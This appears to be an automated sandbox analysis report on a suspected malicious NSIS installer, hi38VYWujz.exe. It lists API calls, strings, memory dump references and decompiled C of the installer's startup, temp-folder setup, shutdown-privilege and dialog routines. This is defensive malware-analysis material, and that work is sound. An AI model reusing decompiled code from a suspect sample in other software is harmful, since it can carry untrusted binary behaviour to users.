0x004036bd
0x00000000
0x004036bd
0x00403629
0x0040362d
0x0040367b
0x0040367b
0x0040367d
0x00403685
0x004036f8
0x004036fa
0x00403701
0x00403709
0x00403709
0x00403714
0x00403719
0x00403728
0x0040372c
0x0040372d
0x00403736
0x0040372f
0x0040372f
0x0040372f
0x0040373c
0x00403742
0x00403749
0x00403751
0x00403751
0x0040375f
0x0040376b
0x00403779
0x0040377e
0x00403784
0x00403790
0x00403796
0x004037a0
0x004037b6
0x004037c7
0x004037cd
0x004037d4
0x004037d7
0x004037dd
0x004037dd
0x004037d4
0x004037e1
0x004037e8
0x004037e8
0x004037ed
0x004037ed
0x00000000
0x00403728
0x00403687
0x0040368a
0x00403695
0x00000000
0x00000000
0x0040369d
0x004036a8
0x004036ad
0x00000000
0x004036ad
0x00403636
0x0040364e
0x0040365f
0x00403660
0x00403664
0x00403666
0x00403674
0x00403677
0x00000000
0x00000000
0x00000000
0x00403677
0x00403679
0x00000000
0x00403679
0x004035a6
0x004035b2
0x004035b7
0x004035bc
0x004035be
0x00000000
0x00000000
0x004035c6
0x004035ce
0x004035df
0x004035e7
0x004035e9
0x004035ee
0x004035f0
0x00000000
0x00000000
0x00000000
0x00403473
0x00403473
0x00403475
0x00403479
0x00403482
0x00403486
0x0040348b
0x0040348c
0x0040348c
0x00403491
0x00000000
0x00403497
0x00403498
0x0040349d
0x0040349f
0x004034a7
0x004034ae
0x004034ae
0x004034a7
0x004034bf
0x004034d2
0x004034d3
0x004034e8
0x004034ed
0x004034f1
0x004034fa
0x00403502
0x00403509
0x00403509
0x00403502
0x00403515
0x00403528
0x00403529
0x0040353e
0x00403544
0x00403548
0x00000000
0x0040356f
0x0040356f
0x00403574
0x0040357d
0x00403582
0x00403582
0x00000000
0x00403582
0x00403548
0x00000000
0x00000000
0x00000000
0x0040347b
0x0040347b
0x0040347c
0x0040347d
0x00000000
0x00403550
0x00403557
0x0040355d
0x00403560
0x00403560
0x00403561
0x00403564
0x00000000
0x0040356d
0x004033a5
0x004033a6
0x004033b2
0x004033b9
0x00000000
0x004033bb
0x004033bd
0x004033cb
0x004033d0
0x004033d7
0x004033db
0x004033df
0x004033e1
0x004033e1
0x004033df
0x00000000
0x004033d7

APIs

SetErrorMode.KERNELBASE ref: 00403373
GetVersion.KERNEL32 ref: 00403379
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033AC
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033E9
OleInitialize.OLE32(00000000), ref: 004033F0
SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 0040340C
GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 00403421
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\hi38VYWujz.exe",00000000,?,00000006,00000008,0000000A), ref: 00403434
CharNextW.USER32(00000000,"C:\Users\user\Desktop\hi38VYWujz.exe",00000020,?,00000006,00000008,0000000A), ref: 0040345B

Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403595
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035A6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035B2
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035C6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035CE
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035DF
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035E7
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035FB

Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036C6
ExitProcess.KERNEL32 ref: 004036E7
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004036FA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403709
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403714
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\hi38VYWujz.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403720
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373C
DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 00403796
CopyFileW.KERNEL32(C:\Users\user\Desktop\hi38VYWujz.exe,0079F6E0,?,?,00000006,00000008,0000000A), ref: 004037AA
CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037D7
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403806
OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403822
AdjustTokenPrivileges.ADVAPI32 ref: 00403845
ExitWindowsEx.USER32(00000002,80040002), ref: 0040386A
ExitProcess.KERNEL32 ref: 0040388D

Strings

SeShutdownPrivilege, xrefs: 0040381C
C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra, xrefs: 00403578, 00403698, 00403742, 0040374C
~nsu, xrefs: 004036F2
C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen, xrefs: 004036A3
TMP, xrefs: 004035E2
Error launching installer, xrefs: 0040367D
"C:\Users\user\Desktop\hi38VYWujz.exe", xrefs: 00403427, 0040342D, 00403623
UXTHEME, xrefs: 004033A0, 004033A5, 004033AB
.tmp, xrefs: 0040370E
Low, xrefs: 004035C8
C:\Users\user\AppData\Local\Temp\, xrefs: 0040358A, 0040358F, 004035A5, 004035B1, 004035C0, 004035CD, 004035D9, 004035E1, 004036F7, 00403708, 00403713, 0040371F, 0040372C, 0040373B, 004037EC
C:\Users\user\Desktop\hi38VYWujz.exe, xrefs: 004037A5
NSIS Error, xrefs: 00403412
C:\Users\user\Desktop, xrefs: 00403719, 0040371E, 0040374B
\Temp, xrefs: 004035AC
TEMP, xrefs: 004035DA
1033, xrefs: 004035F6

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\hi38VYWujz.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra$C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen$C:\Users\user\Desktop$C:\Users\user\Desktop\hi38VYWujz.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-3765026179
Opcode ID: 50ce3784074dcbd526eb1f42df312bf4ec451fb13847cd92a6110888af3a5c2d
Instruction ID: f8b53dcf82f20274bbdd851e6e7f34b77cfd1224ece1df9e86175f3a8edd883a
Opcode Fuzzy Hash: 50ce3784074dcbd526eb1f42df312bf4ec451fb13847cd92a6110888af3a5c2d
Instruction Fuzzy Hash: CED11371500310AAD7207F759D85B3B3AACEB41746F00493FF981B62E2DB7D8A458B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404C3F Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00404C3F(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				long _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t279;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x7a8a68;
				_t282 = 0;
				_v24 =  *0x7a8a34 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x7a8a3d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404B8D(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x7a8a3c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x7a1f04;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x7a1f18;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x7a1f04 = _t282;
								 *0x7a1f18 = _t282;
								 *0x7a8aa0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x7a8a3d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404C0D();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x7a1f18;
									_t195 =  *0x7a8a68;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x7a8a6c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, "true");
										if( *((intOrPtr*)( *0x7a79fc + 0x10)) != _t282) {
											E00404B48(0x3ff, 0xfffffffb, E00404B60(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x7a8a6c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x7a1f18);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x7a8aa0 = _t306;
					 *0x7a1f18 = GlobalAlloc(0x40,  *0x7a8a6c << 2);
					_t252 = LoadBitmapW( *0x7a8a20, 0x6e);
					 *0x7a1f0c =  *0x7a1f0c | 0xffffffff;
					_t313 = _t252;
					 *0x7a1f14 = SetWindowLongW(_v8, 0xfffffffc, E00405237);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f04 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f04);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							_t279 = SendMessageW(_v12, 0x143, _t282, E00406281(_t282, _t314, _t318, _t282, _t260)); // executed
							SendMessageW(_v12, 0x151, _t279, _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004041F4(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004041F4(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x7a8a6c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageW(_v8, 0x1132, 0,  &_v84); // executed
										 *( *0x7a1f18 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x7a1f18 + _t316 * 4) = _t276;
									_t284 =  *( *0x7a1f18 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x7a8a6c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404229(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404229(_v12);
								L91:
								return E0040425B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404c4e
0x00404c5f
0x00404c64
0x00404c6c
0x00404c72
0x00404c7a
0x00404c88
0x00404c8b
0x00404eac
0x00404eb3
0x00404ec7
0x00404eb5
0x00404eb7
0x00404eba
0x00404ebb
0x00404ec2
0x00404ec2
0x00404ed3
0x00404ee1
0x00404ee4
0x00404efa
0x00404f6f
0x00404f72
0x00404f74
0x00404f7e
0x00404f8c
0x00404f8c
0x00404f8e
0x00404f98
0x00404f9e
0x00404fa1
0x00404fa4
0x00404fbf
0x00404fa6
0x00404fb0
0x00404fb0
0x00404fa4
0x00404f98
0x00000000
0x00404f72
0x00404eff
0x00404f0a
0x00404f0f
0x00404f16
0x00404f1b
0x00404f1f
0x00404f2a
0x00404f2a
0x00404f2e
0x00404f32
0x00404f36
0x00404f49
0x00404f38
0x00404f38
0x00404f3f
0x00404f45
0x00404f41
0x00404f41
0x00404f41
0x00404f3f
0x00404f4d
0x00404f4f
0x00404f62
0x00404f65
0x00404f68
0x00404f68
0x00404f32
0x00000000
0x00404f1f
0x00404f01
0x00404f08
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404fc2
0x00404fc2
0x00404fc9
0x0040503a
0x00405042
0x0040504a
0x0040504a
0x00405053
0x00405055
0x0040505c
0x0040505f
0x0040505f
0x00405065
0x0040506c
0x0040506f
0x0040506f
0x00405075
0x0040507b
0x00405081
0x00405081
0x0040508e
0x004051e4
0x004051eb
0x00405208
0x0040520e
0x00405220
0x00405220
0x00000000
0x00405094
0x00405096
0x0040509b
0x004050a0
0x004050a5
0x004050a7
0x004050a7
0x004050a8
0x004050a9
0x004050ab
0x004050ab
0x004050b3
0x004050f4
0x004050f6
0x00405106
0x00405109
0x0040510e
0x00405115
0x00405118
0x004051ba
0x004051c0
0x004051ce
0x004051df
0x004051df
0x00000000
0x004051ce
0x0040511e
0x00405121
0x00405127
0x0040512c
0x0040512e
0x00405130
0x00405136
0x0040513d
0x00405142
0x00405149
0x0040514c
0x0040514c
0x00405153
0x0040515f
0x00405163
0x00405165
0x00405165
0x00405155
0x00405157
0x00405157
0x00405185
0x00405191
0x004051a0
0x004051a0
0x004051a2
0x004051a5
0x004051ae
0x00000000
0x004050b5
0x004050c0
0x004050c3
0x004050c8
0x004050ca
0x004050ce
0x004050de
0x004050e8
0x004050ea
0x004050ed
0x00000000
0x00000000
0x00000000
0x00000000
0x004050d0
0x004050d0
0x004050d6
0x004050d8
0x004050d8
0x004050d9
0x004050da
0x00000000
0x004050d0
0x004050b3
0x0040508e
0x00404fd1
0x00000000
0x00404fe7
0x00404ff1
0x00404ff6
0x00000000
0x00000000
0x00405008
0x0040500d
0x00405019
0x00405019
0x0040501b
0x0040502a
0x0040502c
0x00405030
0x00405033
0x00000000
0x00405033
0x00404fd1
0x00404c91
0x00404c96
0x00404c9f
0x00404ca6
0x00404cb4
0x00404cbf
0x00404cc5
0x00404cd3
0x00404ce7
0x00404cec
0x00404cf9
0x00404cfe
0x00404d14
0x00404d25
0x00404d32
0x00404d32
0x00404d35
0x00404d3b
0x00404d3d
0x00404d40
0x00404d45
0x00404d4a
0x00404d4c
0x00404d4c
0x00404d60
0x00404d6c
0x00404d6c
0x00404d6e
0x00404d6f
0x00404d74
0x00404d77
0x00404d7a
0x00404d7e
0x00404d83
0x00404d88
0x00404d8c
0x00404d91
0x00404d96
0x00404d98
0x00404da0
0x00404e6b
0x00404e7e
0x00000000
0x00404da6
0x00404da9
0x00404dac
0x00404daf
0x00404daf
0x00404db6
0x00404dbc
0x00404dbf
0x00404dc5
0x00404dc6
0x00404dcb
0x00404dd4
0x00404ddb
0x00404dde
0x00404de1
0x00404de4
0x00404e20
0x00404e41
0x00404e49
0x00404e22
0x00404e2f
0x00404e2f
0x00404de6
0x00404de9
0x00404df8
0x00404e02
0x00404e0a
0x00404e11
0x00404e19
0x00404e19
0x00404de4
0x00404e4f
0x00404e50
0x00404e5c
0x00404e5c
0x00404e69
0x00404e84
0x00404e88
0x00404ea5
0x00404eaa
0x00000000
0x00404e8a
0x00404e8f
0x00404e98
0x00405222
0x00405234
0x00405234
0x00404e88
0x00000000
0x00404e69
0x00404da0

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C57
GetDlgItem.USER32(?,00000408), ref: 00404C62
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CAC
LoadBitmapW.USER32(0000006E), ref: 00404CBF
SetWindowLongW.USER32(?,000000FC,00405237), ref: 00404CD8
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CEC
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CFE
SendMessageW.USER32(?,00001109,00000002), ref: 00404D14
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D20
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D32
DeleteObject.GDI32(00000000), ref: 00404D35
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D60
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D6C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E02
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E2D
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E41
GetWindowLongW.USER32(?,000000F0), ref: 00404E70
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E7E
ShowWindow.USER32(?,00000005), ref: 00404E8F
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F8C
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FF1
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405006
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040502A
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040504A
ImageList_Destroy.COMCTL32(?), ref: 0040505F
GlobalFree.KERNEL32(?), ref: 0040506F
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050E8
SendMessageW.USER32(?,00001102,?,?), ref: 00405191
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051A0
InvalidateRect.USER32(?,00000000,?), ref: 004051C0
ShowWindow.USER32(?,00000000), ref: 0040520E
GetDlgItem.USER32(?,000003FE), ref: 00405219
ShowWindow.USER32(00000000), ref: 00405220

Strings

N, xrefs: 00404ECA
, xrefs: 004051F8
M, xrefs: 00404DE9

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: efe07da3f21e8944becdbd6b16cc60fa8a21edaf4e8f3c48f24736c6ed69ddc7
Instruction ID: 12ef5a05c60c6c20dcbbeb1066bc3531ea5280fcb44ea9637735f2a88fa268fa
Opcode Fuzzy Hash: efe07da3f21e8944becdbd6b16cc60fa8a21edaf4e8f3c48f24736c6ed69ddc7
Instruction Fuzzy Hash: 670260B0900209EFEB109F64DD85AAE7BB5FB85314F10817AF610BA2E1DB799D41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				void* _t246;
				struct HINSTANCE__* _t248;
				void* _t249;
